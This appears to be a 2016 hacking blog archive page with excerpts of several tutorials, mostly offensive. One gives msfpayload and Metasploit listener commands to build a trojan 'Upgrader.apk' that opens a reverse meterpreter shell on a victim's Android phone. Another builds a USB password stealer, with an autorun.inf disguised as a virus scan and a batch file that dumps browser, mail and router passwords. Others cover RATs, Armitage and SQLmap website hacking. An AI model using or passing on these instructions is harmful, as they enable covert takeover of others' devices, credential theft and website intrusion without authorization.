Skip to main content

Posts

Showing posts from April, 2016

How to Hack Android Using Kali

Direct DownloadLinkIn this Tutorial You will be guided How to Hack Android Using Kali. This a completely noob friendly tutorial . With Pics in each steps.All that u need is just Kali Linux installed in your PC and a droid to hackStep 1: Fire-Up Kali:*.Open a terminal, and make aTrojan.apk*.You can do this by typing :*.msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk(replace LHOST with your own IP)*.You can also hack android onWAN i.e. throughInteretby using yourPublic/External IPin the LHOST and byport forwardingStep 2: Open Another Terminal:*.Open another terminal until the file is being produced.*.Load metasploit console, by typing :msfconsoleStep 3: Set-Up a Listener:*.After it loads(generally takes some time), load the multi-handler exploit by typing :use exploit/multi/handler*.Set up a (reverse) payload by typing :set payload android/meterpreter/reverse_tcp*.To set L host type :set LHOST 192.168.0.4(Even if you are hacking on WAN type your pr

Metasploit (Armitage) start up

Step 1: Download Armitage The first step, of course, is to download Armtage. If you have  BackTrack  or the early versions of  Kali , you probably don't have Armitage, but you can get it  from Armitage's website . Click on the download button and it will pull up the following webpage. Make certain that you download the Linux version. Another download option includes using  the command line tool aptitude . Just type the following to install it. kali apt-get install armitage In addition, you can also use the GUI-based tool in Kali, the "Add/Remove Software," and search for "Armitage." Step 2: Start Metasploit Once you have Armitage downloaded onto your system, the next step is to start Matsploit. Make certain the postgreSQL server is started by typing: kali > service postgresql start Now, start Metasploit by typing: kali > msfconsole Step 3: Start Armitage Armitage uses a client/server architecture where Metasploit is the server and Armit

How to successfully hack website in 2016

The reason why a lot of newbies and non-professional hackers fail to get a successful hacking is because they don´t want to wait, most of time they want a magic button where they can click and that´s all, but in the reality it does not work like that, the first thing you have to do is a good reconnaissance about your target, for those familiar with the software development is easier to understand what i mean, you can not develop a good software without a good documentation, just like the UML in software industry here is the same, we need info about the target to make our tasks easier. My Advice on Good Recon What are the services they are running? Figure out stuffs like open ports, software and versions on the server, and try to look for the exploit in case there is at least one online, or you can just make your own exploit. Tools that i recommend for this section are nmap,whatweb and nikto and of course some others made by Mr_ Nakup3nda  or you. Did they write the script by them

Hacking through R.A.T : REMOTE ADMINISTRATION TOOL

What is Remote Administration Tool ( R.A.T) Yeah, you guessed it right. I am talking of Remote Administration Tool, not the small pesky creature which might have troubled you for the last few days. Believe me, if you are troubled by that Rat, then this one is going to blow your minds. A Remote administration tool (RAT) is a piece of software that allows a remote “operator” to control a system as if he has physical access to that system. You may have used TEAM VIEWER, VNC, etc. They are Remote Administration Tool but think of  a situation when a  hacker installs a malicious R.A.T on your computer (Back Orifice, iControl, NetBus, DarkComet,BlackShades,etc)  without your knowledge. Such type of software hide its operation from the victim and from security software. Think  of  the possibilities what such a software could do. Maybe you are typing confidential company reports, entering your Bank Credentials, typing your passwords,etc. That R.A.T  can log all your activities and secretly tr

Steganography: Steps to Hide data behind Image

I wonder if you have ever faced situation when you need some important files of yours to be known only to you without ever having any sign that you are hiding something. You may have faced a creepy situation when you are hiding your personal diary in your computer and just everybody in your house wants to see it or you want to send your friends a hidden message. If you have ever faced such a situation, then let me tell you about Steganography. Big Name, isn’t it? But actually it is much simple.  Steganography is the practice of concealing a file, message, image, or video within another file, message, image, or video. You may wonder why to use Steganography if you have various Encryption Technology that may better handle your privacy. Answer is simple, Plainly visible encrypted messages—no matter how unbreakable—arouse interest, and may in themselves be incriminating in countries where encryption is illegal. Thus, whereas cryptography is the practice of protecting the contents of a m

Linux Basic Commands

The below commands are important and often used. mkdir  – make directories Usage: mkdir [OPTION] DIRECTORY… eg. mkdir lhn ls  – list directory contents Usage: ls [OPTION]… [FILE]… eg. ls, ls ­l, ls lhn cd  – changes directories Usage: cd [DIRECTORY] eg. cd lhn pwd  ­-  print name of current working directory Usage: pwd vim  – Vi Improved, a programmers text editor Usage: vim [OPTION] [file]… eg. vim lhn.txt cp  – copy files and directories Usage: cp [OPTION]… SOURCE DEST eg. cp sample.txt sample_copy.txt cp sample_copy.txt target_dir mv  – move (rename) files Usage: mv [OPTION]… SOURCE DEST eg. mv source.txt target_dir mv old.txt new.txt rm  ­ remove files or directories Usage: rm [OPTION]… FILE… eg. rm file1.txt , rm ­rf some_dir find  – search for files in a directory hierarchy Usage: find [OPTION] [path] [pattern] eg. find file1.txt, find ­name file1.txt history  – prints recently used commands Usage: history cat  – concatenate files and prin

Steal All Password Of Computer Using USB

Here is the tutorial you want Friends, you can steal any pass means all passwords related to that computer. it can also steal once saved browser passes.  How to make stealer? Download This Ready made Files or make your own way as shown below-  Download Now   OR try this  Mirror Or Custom Making of stealer: Step 1: Open Notepad and Create a new file. Type or copy/paste Text below:- [autorun] open=launch.bat ACTION= Perform a Virus Scan Save this as AUTORUN.inf  ( NOTE:  extension must be .inf  not .txt) Step 2: Now again open Notepad and Create a new file. Type or copy/paste Text below… start mailpv.exe /stext pass/mailpv.txt start pspv.exe /stext pass/pspv.txt start PasswordFox.exe /stext pass/passwordfox.txt start OperaPassView.exe /stext pass/OperaPassView.txt start ChromePass.exe /stext pass/ChromePass.txt start WebBrowserPassView.exe /stext pass/AllBrowserPass.txt start mspass.exe /stext pass/msofficepass.txt start RouterPassView.exe /stext pass/Router.txt start net

Hacking Website with Sqlmap in Kali Linux

Hacking Website with Sqlmap in Kali Linux A screenshot from the SQLmap official websiteIn the previous tutorial, we hacked a website using nothing but a simple browser on a Windows machine. It was a pretty clumsy method to say the least. However, knowing the basics is necessary before we move on to the advanced tools. In this tutorial, we'll be using Kali Linux (see the top navigation bar to find how to install it if you haven't already) and SqlMap (which comes preinstalled in Kali) to automate what we manually did in the  Manual SQL Injection tutorial to hack websites . Now it is recommended that you go through the above tutorial once so that you can get an idea about how to find vulnerable sites. In this tutorial we'll skip the first few steps in which we find out whether a website is vulnerable or not, as we already know from the previous tutorial that  this website  is vulnerable. Kali Linux First off, you need to have Kali linux (or backtrack) up and running on you